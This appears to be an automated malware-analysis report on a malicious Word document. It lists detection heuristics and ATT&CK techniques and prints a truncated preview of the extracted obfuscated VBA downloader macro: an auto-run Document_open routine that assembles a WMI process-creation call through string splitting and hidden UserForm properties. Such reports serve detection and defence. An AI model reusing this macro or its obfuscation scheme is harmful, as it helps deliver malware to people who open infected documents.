MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains a high-confidence VBA macro that utilizes CreateObject and a hidden UserForm property to execute a command stager. This is indicative of a downloader malware designed to fetch and run additional malicious content. The ClamAV detection further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-9390508-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-9390508-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15418 bytes |
SHA-256: 3b541d1a06fec2b75d26625bee04a77b958d16615b102616d01a2edd6e46f520 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "I2n1w6ykqx77"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Grf_231rgq6feyuaib.Qi70lrjd711r
End Sub
Attribute VB_Name = "Grf_231rgq6feyuaib"
Attribute VB_Base = "0{4CCBBDD9-2F43-4924-A1D3-20784628854E}{86795B27-A500-4953-9058-99E831039F7D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Qi70lrjd711r()
Cqvj_2ovmsj9keasd = "326"
If Len("S_0ydnujvix4zy4d7Mzrei4whaic0vydyh") = Len("Wqmiz1ff9u5wfhihao") + 1 Then End
If Len("O2gc8nmhwx_zbqGqrja30c6cnoc71ox1Qezoq6nttt964") < Len("G0413oxwzl_t") Then
MsgBox "Gl7in_343ucboxipu8" + "Pi599z6lxbqn"
MsgBox ("Y8dhykv7anrp2z")
MsgBox "Togep491qo0uty" + "Tlhydstb3kmm"
End If
If Len("Wmthaqvj6m0v_gyS2bh7wfhcv8hno6cr") = Len("We72ucd78_jdd") Then
MsgBox "Whduke1kglfpu" + "Xrr7exmt09g_e"
MsgBox ("Sg0_rvmflk3nxv9vwe !!!")
MsgBox "Saqsn0q_mifnk_1" + "Amf00a2fhd3a3wo"
End If
Lxyicsb181j_71k1r = Grf_231rgq6feyuaib.HelpContextId + 50 + 50
D67011_nm4uojcnw = "325"
If Len("Ugywtljhyqkbx5nqS0q67bm_omn") = Len("U2wx9x8ebxtx2bjzlz") + 1 Then End
If Len("E0gmpg57flxe_7j8zzSgrlbdp4d63yzzE_wphqe234psu") < Len("Mfua7_42xej_o1bn") Then
MsgBox "Yqx1jkkr0wqztxv6" + "P1iy41tqmsf"
MsgBox ("Bo1pfqc8bi6j")
MsgBox "Xonberzfldleag1" + "G84fj8h2knh"
End If
If Len("Ybn70e7lgoibrc3Kkfkm43lcejag") = Len("T2jfgk2qg8lo97z") Then
MsgBox "Rhf8m_i8ggjc4666f" + "Qr3l8ru0ei_978x"
MsgBox ("Lc7kk3sn_aayx !!!")
MsgBox "Bqjnii_nlymn7" + "Yjknqso306j60pm7r7"
End If
V90hxq6qo_80y = ChrW(Lxyicsb181j_71k1r + (15))
W9ajpkf2cmbr = "275"
If Len("U1af09h9xj4r3o4vpjV6i7olmp7riyz") = Len("Lh2_qh7pjiyi4y") + 1 Then End
If Len("Jfydzxbu5x6wsmrpwdIhcw0crovaiNzttluv_5px8") < Len("Pwod44ce4mzku") Then
MsgBox "Ahjqtwsm8_4f6beg" + "Ofjnrdl4hga1m6i36u"
MsgBox ("O0dk6jzokx0aawqef")
MsgBox "Iue0ymqrwvfvo" + "Mlw9q6oe3za"
End If
If Len("Gf_e71dru_zwU6nxej1j9u1_s") = Len("H8h3p9tclsszpr9q") Then
MsgBox "Q_yyaasypl7lwk" + "Jb5vmijz21u7"
MsgBox ("L6jmrcc_6_k7 !!!")
MsgBox "C_xx21inknxnejnl" + "Zrfnivbu5thetbuzxe"
End If
Zjhi2dxrnjci_i = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + V90hxq6qo_80y + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Grf_231rgq6feyuaib.Ik112dl8st75tdo + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
G7qbayytnfsl8 = "450"
If Len("Ppfagi33kfsrps3gJzg9i53__5b1_") = Len("Gte8bqav1trvltuif3") + 1 Then End
If Len("Vfx21owoago1Hhj9lw21l30Lxsiq2zktf3x4ptp") < Len("Zol4pkejw9u") Then
MsgBox "Msoyej2efvp" + "Ltfpxf7clymny6bm"
MsgBox ("Z55ekbyo0yg3l")
MsgBox "K0wn7f1xrbrz5gaakh" + "Tg3wvgsrayr1l_"
End If
If Len("Yobsfhymm4yvisn0oJv1xnagnyz0algzbiw") = Len("Ucid5p49wk_yzc30pb") Then
MsgBox "Abl3t0omrs7gj" + "Aw8fr8ivdvdybj9uh"
MsgBox ("Z9v9rkzeqdmq1 !!!")
MsgBox "T8zr759fcq9" + "R69ep9kwhlgcewqn"
End If
Mz7pnzlpz0fnojmome = Of250_xwlvwccd1q(Zjhi2dxrnjci_i)
Dq5s2cso9fpa = "994"
If Len("D881879n32fj7u_1uG4ovso3exppx467sit") = Len("Jrey5n1zj6t") + 1 Then End
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.